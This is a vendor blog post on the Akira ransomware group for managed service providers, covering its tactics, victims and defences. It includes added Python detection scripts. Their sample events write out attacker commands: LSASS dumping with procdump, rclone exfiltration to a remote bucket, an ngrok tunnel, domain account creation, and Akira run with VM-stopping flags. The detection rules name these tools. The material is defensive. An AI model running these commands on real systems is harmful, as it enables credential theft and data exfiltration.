ConnectWise

4/24/2026 | 13 Minute Read

Akira ransomware

    Key takeaways

    • Akira ransomware has scaled rapidly, surpassing $244 million in payments with approximately five times year-over-year growth.
    • Double extortion increases pressure, combining encryption with data theft and leak threats.
    • Attacks are fast and stealthy, with data exfiltration possible in just hours.
    • Initial access is credential-driven, often through compromised VPN accounts and unpatched systems.
    • Rapid exploitation of vulnerabilities fuels attacks, making timely patching and monitoring critical.

    Akira ransomware emerged in March 2023 as one of the most financially successful and technically sophisticated ransomware operations targeting critical infrastructure worldwide. Operating as a ransomware-as-a-service (RaaS) group, Akira has collected over $244 million in ransom payments and claimed hundreds of victims across manufacturing, healthcare, education, financial services, and IT sectors as of late 2025. Notably, this represents an approximate five-times year-over-year increase in ransom revenue, underscoring the group’s rapid growth and escalating impact.

    The ransomware gained notoriety for its aggressive double-extortion tactics, lightning-fast data exfiltration capabilities, and distinctive retro-themed data leak site styled after 1980s “green screen” consoles. Akira threat actors, potentially linked to the defunct Conti ransomware group, primarily target small and midsized businesses (SMBs) but have also successfully compromised larger organizations.

    For managed service providers (MSPs) advising clients on cybersecurity best practices, understanding Akira’s evolving tactics is critical. The group has demonstrated remarkable adaptability, expanding from Windows systems to Linux variants targeting VMware ESXi virtual machines and, as of June 2025, Nutanix AHV environments. Recent CISA and FBI advisories warn that Akira remains one of the top five ransomware variants actively threatening US businesses, with activity accelerating dramatically throughout 2025. Keep reading for comprehensive guidance on protecting your clients from this persistent threat.

    What is Akira ransomware?

    Akira ransomware actors typically gain unauthorized access through compromised VPN credentials, exploited vulnerabilities in edge devices, or stolen credentials purchased from initial access brokers. Throughout 2025, Akira operators have actively exploited critical vulnerabilities, including CVE-2024-40766 (SonicWall), CVE-2023-20269 (Cisco ASA/FTD), and vulnerabilities in Veeam backup servers.

    Once inside a network, Akira threat actors move with exceptional speed. CISA reporting from November 2025 confirms that in some incidents, they’ve exfiltrated data in just over two hours from initial access. They establish persistent access using legitimate remote access tools such as AnyDesk and LogMeIn, then deploy reconnaissance tools, including ADFind, to gather Microsoft Entra ID information and network scanners to map the environment. The attackers then use the gathered information to create new domain accounts and employ Kerberoasting techniques to harvest credentials from Entra ID. They typically focus on domain controllers, backup infrastructure, and virtualization infrastructure for credential harvesting, then use these accounts to deploy the ransomware.

    During the exfiltration phase, Akira actors compress sensitive data using WinRAR and transfer it via FileZilla, WinSCP, or RClone to cloud storage or through encrypted tunnels such as Ngrok. The ransomware is then deployed; it uses a sophisticated hybrid ChaCha20/RSA encryption scheme and appends file extensions including .akira, .akiranew, .powerranges, or .aki to encrypted files. Unlike some ransomware groups, Akira doesn’t leave an initial ransom demand. Victims must contact the attackers through a Tor-based portal to receive payment instructions.

    Akira’s double-extortion model adds significant pressure: If victims refuse to pay for decryption keys, the threat actors publish stolen data on their leak site. In some cases, they’ve even called victimized companies directly to increase pressure. This multilayered approach makes Akira particularly challenging for organizations to navigate.

    Notable Akira ransomware attacks

    Akira activity accelerated dramatically in 2025, with the group already claiming twice as many victims in the first months of 2025 as they did in all of 2024. In November 2024 alone, Akira published details of 73 victims, with 35+ appearing on their leak site in a single day, an unprecedented surge that continued throughout 2025.

    Hitachi Vantara

    In April 2025, major cyber-infrastructure provider Hitachi Vantara reported a disruptive ransomware incident and took servers offline. Multiple cybersecurity outlets linked the activity to Akira, though the vendor continued its investigation. For a service provider such as Hitachi Vantara that hosts multiple customers, the downtime resulted in an extremely costly attack affecting downstream clients.

    SonicWall Financial Sector Campaign

    Beginning in July 2025, Akira launched an aggressive campaign exploiting CVE-2024-40766 in SonicWall firewall devices, specifically targeting financial institutions’ remote access infrastructure. The ConnectWise Cyber Research Unit™ (CRU) reported a marked increase in Akira activity targeting SonicWall SSL VPN accounts from late July through the remainder of 2025. In October 2025 alone, attackers using Akira compromised over 70 victims by exploiting publicly accessible SonicWall devices. This sustained campaign demonstrated Akira operators’ ability to rapidly weaponize newly disclosed vulnerabilities and maintain pressure on specific sectors.

    Global Data Storage Company

    A detailed analysis published by Palo Alto Networks Unit 42 in November 2025 revealed a sophisticated 42-day compromise of a global data storage and infrastructure company. The attack, orchestrated by Howling Scorpius, the group that distributes Akira ransomware, began when an employee clicked on what appeared to be a routine CAPTCHA check on a compromised car dealership website. This social engineering technique, called ClickFix, disguised malware delivery as a legitimate security verification.

    The incident exposed a critical gap in detection capabilities. The victim company had deployed two different enterprise endpoint detection and response (EDR) solutions that recorded all malicious activity in their logs, yet generated very few alerts. This meant security teams had theoretical visibility but no practical awareness until encryption began across three separate networks.

    RJS Corporation

    On January 7, 2026, Akira claimed responsibility for a cyberattack on RJS Corporation, a major player in the tire manufacturing sector based in the US. The threat actors announced plans to release sensitive corporate and employee data unless their demands were met, continuing Akira’s pattern of targeting manufacturing companies.

    Epport, Richman & Robbins, LLP

    On January 13, 2026, Akira targeted this renowned Los Angeles-based law firm, compromising 10GB of sensitive legal data. The attack exemplified Akira’s continued focus on professional services firms that handle confidential client information, where the threat of data exposure carries significant regulatory and reputational consequences.

    Manufacturing and professional services wave

    Sophos analysis indicates that 149 victims have been linked to Akira ransomware attacks in the 90 days preceding November 2025, with a predominance in manufacturing, legal and professional services, and construction and engineering sectors. The group has also targeted MSPs, including Toppan Next Tech, a Singapore-based printing company that reported a ransomware intrusion exposing client statements.

    The FBI reports that Akira is currently among the top five ransomware variants targeting US businesses out of over 130 active ransomware groups under investigation. With the group’s tactics constantly evolving and their technical capabilities expanding to include Nutanix AHV environments as of June 2025, understanding Akira’s methodology remains essential for protecting your clients.

    Responding to an Akira ransomware attack

    When an organization has been compromised by Akira ransomware, the attackers communicate exclusively through their Tor-based negotiation portal. Victims must enter a unique password from the ransom note to access this portal, where Akira operators provide proof of stolen data and present payment demands.

    In a revealing 2025 case documented by security researchers, Akira encrypted an organization’s systems and demanded $600,000, ultimately settling for $200,000. What made this incident particularly notable was the attackers’ final message. It didn’t just include a decryption tool, but came with a security checklist. “Don’t want us to hack you again? Here’s what you need to do,” the attackers wrote, before signing off with the unsettling note: “We wish you safety, calmness, and lots of benefits in the future.”

    Payment of the ransom is strongly discouraged by law enforcement and cybersecurity authorities. Paying does not guarantee that files will be decrypted or that stolen data won’t be published. Additionally, ransom payments fund further criminal operations and encourage additional attacks on other organizations. The FBI emphasizes that paying ransoms makes organizations attractive targets for future attacks. Data from Coretelligent reveals a notable shift: Only 25% of victims now agree to pay ransoms, the lowest rate seen in three years, prompting Akira to rely even more heavily on data theft as extortion leverage.

    If your client experiences an Akira incident, immediate reporting is critical. Contact the FBI’s Internet Crime Complaint Center (IC3), your local FBI field office, or CISA’s 24/7 Operations Center at contact@cisa.dhs.gov or 1-844-SAY-CISA (1-844-729-2472). Early reporting enables law enforcement to track threat actor patterns and potentially recover stolen funds through cryptocurrency tracing.

    Protecting against Akira ransomware

    Protecting against Akira ransomware requires a comprehensive, layered defense strategy. Because Akira actors continuously evolve their techniques, most recently expanding to target Nutanix AHV environments in June 2025 and deploying the faster Akira_v2 encryption variant, MSPs must maintain vigilant security postures across all client networks.

    Prioritize patching known exploited vulnerabilities

    Akira actively exploits specific vulnerabilities in VPN products, edge devices, and backup servers. The SonicWall campaign that began in July 2025 and remained active through the remainder of the year demonstrates the group’s focus on unpatched edge devices. Establish a rigorous patch management process that remediates known exploited vulnerabilities within 30 days, prioritizing:

    Regular vulnerability scanning and automated patch deployment help reduce the attack surface that Akira operators actively target.

    Implement phishing-resistant multi-factor authentication

    The majority of Akira compromises begin with stolen credentials or brute force attacks against VPN services lacking multi-factor authentication (MFA). Throughout 2025, Akira operators increasingly used stolen or purchased admin credentials to gain initial access. Implement and strictly enforce phishing-resistant MFA for:

    • All VPN and remote access services
    • Webmail and collaboration platforms
    • Administrative and privileged accounts
    • Backup management systems

    Hardware-based MFA tokens provide the strongest protection for critical systems. Even organizations with MFA enabled should ensure it’s configured correctly, as Akira has successfully targeted improperly configured VPN implementations.

    Maintain offline, immutable backups

    Akira specifically targets backup infrastructure, often deleting volume shadow copies and compromising backup servers before deploying encryption. The November 2025 Palo Alto Networks case study revealed that Akira can exfiltrate data from Veeam servers in approximately two hours, demonstrating their focus on neutralizing recovery capabilities.

    To combat this, implement a robust 3-2-1 backup strategy: Maintain three copies of data on two different media types, with one copy stored offline and air-gapped from the network. Regular backup testing and restoration exercises ensure recovery capabilities remain functional when needed most.

    Deploy comprehensive endpoint monitoring and EDR

    Akira’s rapid attack timeline, sometimes exfiltrating data within two hours of initial access, demands real-time threat detection capabilities. The November 2025 global data storage company incident revealed a critical gap: organizations deploying EDR solutions that log activity without generating actionable alerts. Palo Alto Networks’ Global Incident Response 2025 report found that in 75% of incidents analyzed, clear evidence of malicious activity existed in logs but remained hidden due to inadequate alerting.

    Deploy Managed EDR solutions with 24/7 security operations center (SOC) monitoring configured to actively alert on:

    • Unauthorized domain account creation
    • Unusual network activity and lateral movement patterns
    • Execution of reconnaissance tools such as ADFind
    • Suspicious use of compression tools (WinRAR) or file transfer utilities
    • LSASS memory dumping attempts
    • Command and control communications via tunneling utilities such as Ngrok

    EDR solutions should include behavioral detection capabilities to identify legitimate tools being abused for malicious purposes, as Akira frequently weaponizes administrative utilities.

    Protect virtualization environments

    A major technical development in 2025 was Akira’s expansion beyond VMware ESXi to successfully encrypt Nutanix AHV virtual disk files for the first time in June. This expansion is particularly concerning given Gartner’s prediction that by 2028, 35% of VMware workloads will have migrated to alternative platforms, with Nutanix frequently suggested as a first choice.

    Implement additional protections for hypervisor management interfaces:

    • Segment virtualization management networks from general infrastructure
    • Enforce strict access controls and MFA for hypervisor consoles
    • Monitor for unauthorized use of VM-specific commands (--vmonly, --stopvm)
    • Regularly audit hypervisor admin credentials
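    The EDR alert categories listed above and the VM-specific flag monitoring in this list are the same kind of rule-based detection. As an added example (not ConnectWise code and not tied to any particular EDR product), the Python below runs such rules over constructed process-creation events and escalates any account that trips several distinct stages, since one archive or one admin tool alone is noisy while account creation plus recon plus tunneling from the same account is not. The event field layout, the sample events and the regular expressions are assumptions.

```python
import re

# Constructed process-creation events in a simplified "host|user|image|command_line"
# form; these are illustrative, not telemetry from any real incident.
SAMPLE_EVENTS = """\
ws01|CORP\\jdoe|C:\\Windows\\System32\\net.exe|net user svc_backup P@ss! /add /domain
ws01|CORP\\jdoe|C:\\Tools\\AdFind.exe|AdFind.exe -f (objectcategory=person) > users.txt
fs02|CORP\\svc_backup|C:\\Program Files\\WinRAR\\WinRAR.exe|WinRAR.exe a -r -hp D:\\stage\\fin.rar \\\\fs02\\finance
fs02|CORP\\svc_backup|C:\\Tools\\rclone.exe|rclone.exe copy D:\\stage remote:bucket --transfers 32
dc01|CORP\\svc_backup|C:\\Tools\\procdump64.exe|procdump64.exe -ma lsass.exe lsass.dmp
ws01|CORP\\jdoe|C:\\Users\\jdoe\\ngrok.exe|ngrok.exe tcp 3389
esx01|root|/tmp/akira|/tmp/akira -p=/vmfs/volumes --vmonly --stopvm
ws05|CORP\\asmith|C:\\Windows\\System32\\notepad.exe|notepad.exe notes.txt
"""

# One rule per alert category from the text above; each pattern matches the command line.
RULES = {
    "domain account creation": r"\bnet1?(?:\.exe)?\s+user\s+\S+(?:\s+\S+)?\s+/add\b",
    "AD reconnaissance (AdFind)": r"\badfind(?:\.exe)?\b",
    "archive staging (WinRAR)": r"\b(?:winrar|rar)(?:\.exe)?\s+a\b",
    "bulk transfer (rclone/WinSCP/FileZilla)": r"\b(?:rclone|winscp|filezilla)(?:\.exe)?\b",
    "LSASS memory access": r"\blsass(?:\.exe)?\b",
    "tunneling (ngrok)": r"\bngrok(?:\.exe)?\b",
    "hypervisor VM-targeting flags": r"--(?:vmonly|stopvm)\b",
}
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in RULES.items()]

def detect(events_text):
    """Return one alert dict per (event, rule) match."""
    alerts = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        host, user, image, cmdline = line.split("|", 3)
        for name, rx in COMPILED:
            if rx.search(cmdline):
                alerts.append({"host": host, "user": user, "rule": name, "cmd": cmdline})
    return alerts

def escalate(alerts, min_stages=3):
    """Group alerts by account; an account that hits several distinct stages is far
    more likely to be an intrusion chain than a lone administrative tool."""
    stages = {}
    for a in alerts:
        stages.setdefault(a["user"], set()).add(a["rule"])
    return {u: sorted(s) for u, s in stages.items() if len(s) >= min_stages}

if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for a in found:
        print(f"[{a['rule']}] {a['host']} {a['user']}: {a['cmd']}")
    print("escalate:", escalate(found))
```

    On the constructed events this raises seven alerts and escalates two accounts (the one that created a domain account, ran AdFind and started ngrok, and the service account that archived, transferred and touched LSASS), while the lone hypervisor event stays a single alert.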

    Enforce strong password policies and credential hygiene

    Akira operators frequently gain access using compromised credentials purchased from initial access brokers, stolen VPN accounts, or brute force attacks against weak passwords. Implement CISA-recommended password length and complexity standards, enforce regular credential rotation for privileged accounts, and deploy password managers to eliminate credential reuse.

    In addition, organizations should implement stronger controls around administrative and privileged access. Securing remote administrative sessions, enforcing least-privilege access, and monitoring how least-privileged credentials are used can help prevent attackers from escalating privileges or moving laterally after gaining initial access. Tight oversight of privileged account usage and remote management activity reduces the likelihood that compromised credentials can be leveraged to access domain controllers, backup infrastructure, or other critical systems commonly targeted in ransomware attacks.

    Investigate signs of credential compromise promptly, including repeated failed login attempts, unusual access patterns, and leaked credentials appearing in breach databases.
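    The “repeated failed login attempts” signal above, worked through as an added example (not ConnectWise’s or any vendor’s code): a small Python analyser over constructed VPN authentication log lines that flags brute force against one account, password spraying across many accounts from one source, and the highest-fidelity case, a success immediately following a burst of failures. The log format, thresholds and window length are assumptions; the source addresses are RFC 5737 documentation ranges.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed VPN authentication log lines (illustrative; not from any real device or incident).
SAMPLE_LOG = """\
2025-07-29T02:14:05Z vpn01 sslvpn: user=alice src=203.0.113.7 result=FAIL
2025-07-29T02:14:09Z vpn01 sslvpn: user=alice src=203.0.113.7 result=FAIL
2025-07-29T02:14:12Z vpn01 sslvpn: user=alice src=203.0.113.7 result=FAIL
2025-07-29T02:14:16Z vpn01 sslvpn: user=alice src=203.0.113.7 result=FAIL
2025-07-29T02:14:20Z vpn01 sslvpn: user=alice src=203.0.113.7 result=FAIL
2025-07-29T02:14:31Z vpn01 sslvpn: user=alice src=203.0.113.7 result=SUCCESS
2025-07-29T02:20:01Z vpn01 sslvpn: user=bob src=198.51.100.4 result=FAIL
2025-07-29T02:20:03Z vpn01 sslvpn: user=carol src=198.51.100.4 result=FAIL
2025-07-29T02:20:05Z vpn01 sslvpn: user=dave src=198.51.100.4 result=FAIL
2025-07-29T02:20:07Z vpn01 sslvpn: user=erin src=198.51.100.4 result=FAIL
2025-07-29T03:05:00Z vpn01 sslvpn: user=frank src=192.0.2.9 result=FAIL
2025-07-29T03:05:30Z vpn01 sslvpn: user=frank src=192.0.2.9 result=SUCCESS
"""

LINE_RE = re.compile(r"^(\S+) \S+ sslvpn: user=(\S+) src=(\S+) result=(FAIL|SUCCESS)$")

def parse(log_text):
    """Return (timestamp, user, src, result) tuples in time order."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
            events.append((ts, m.group(2), m.group(3), m.group(4)))
    return sorted(events)

def analyse(log_text, window=timedelta(minutes=5), fail_threshold=5, spray_users=4):
    """Return (alert_type, src, user) tuples; brute force and spray fire once per source."""
    alerts, reported = [], set()
    fails = defaultdict(deque)        # (src, user) -> failure timestamps inside the window
    users_by_src = defaultdict(dict)  # src -> {user: time of last failure}
    for ts, user, src, result in parse(log_text):
        q = fails[(src, user)]
        while q and ts - q[0] > window:   # drop failures older than the window
            q.popleft()
        if result == "FAIL":
            q.append(ts)
            if len(q) >= fail_threshold and ("brute_force", src, user) not in reported:
                reported.add(("brute_force", src, user))
                alerts.append(("brute_force", src, user))
            users_by_src[src][user] = ts
            recent = [u for u, t in users_by_src[src].items() if ts - t <= window]
            if len(recent) >= spray_users and ("password_spray", src) not in reported:
                reported.add(("password_spray", src))
                alerts.append(("password_spray", src, None))
        else:
            # A success right after a burst of failures means the guessed or purchased
            # credential worked: treat it as a probable compromise, not a noisy login.
            if len(q) >= fail_threshold:
                alerts.append(("success_after_failures", src, user))
            q.clear()
    return alerts
```

    Calling analyse(SAMPLE_LOG) yields a brute-force alert and a success-after-failures alert for the first source, and a password-spray alert for the second; the single failure followed by a success from the third source is treated as a normal typo and not reported.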

    Maintain threat intelligence awareness

    Stay current with CISA and FBI #StopRansomware advisories, which provide updated indicators of compromise (IOCs) and tactics specific to Akira operations. The November 13, 2025, advisory update included critical new TTPs from recent attacks. Subscribe to threat intelligence feeds and participate in information-sharing organizations such as FS-ISAC or MS-ISAC to receive early warning of emerging Akira campaigns.

    To strengthen your security posture even further, leverage provider-driven threat intelligence from the ConnectWise Cybersecurity Research Unit (CRU), which delivers continuous MSP-focused insights, including the annual MSP Threat Report.

    Leverage comprehensive cybersecurity solutions

    A robust cybersecurity solution empowers MSPs with the resources, information, and software needed to stay ahead of evolving threats, such as Akira ransomware. These tools are essential to preventing and mitigating ransomware attacks that can devastate client operations.

    With detection and response solutions such as Managed EDR and SIEM, plus vulnerability management, email security, security awareness training, and privileged access controls for securing remote administrative sessions with solutions such as Privileged Access, ConnectWise offers a suite of cybersecurity management software and support solutions to help protect your clients’ most critical assets.

    Explore our cybersecurity demo to see firsthand how the right solution can help uplevel your cybersecurity offerings and defend against sophisticated threats, including Akira ransomware.

    FAQs

    What is Akira ransomware?

    Akira is a ransomware-as-a-service (RaaS) operation that encrypts systems and steals sensitive data, using double extortion to pressure victims into paying.

    How does Akira typically gain access?

    Akira most often gains entry through:

    • Compromised VPN credentials
    • Unpatched vulnerabilities in edge devices
    • Stolen credentials from initial access brokers

    What makes Akira different from other ransomware groups?

    Key differentiators include:

    • Extremely fast attack timelines
    • Strong focus on data exfiltration
    • Expansion into virtualized environments (ESXi, Nutanix AHV)
    • Aggressive exploitation of newly disclosed vulnerabilities

    Who does Akira target?

    Akira primarily targets small and midsized businesses (SMBs) but has also impacted large enterprises across:

    • Manufacturing
    • Healthcare
    • Financial services
    • Professional services and MSPs

    Should organizations pay the ransom?

    No. Law enforcement strongly discourages payment because:

    • It doesn’t guarantee data recovery
    • Stolen data may still be leaked
    • It funds further criminal activity

    How can organizations protect against Akira ransomware?

    Key defenses include:

    • Enforcing phishing-resistant MFA
    • Rapid patching of known vulnerabilities
    • Maintaining offline, immutable backups
    • Deploying 24/7 monitored EDR solutions
    • Securing virtualization environments

    How quickly can an Akira attack escalate?

    In some cases, attackers have moved from initial access to full data exfiltration in just a few hours, making early detection critical.
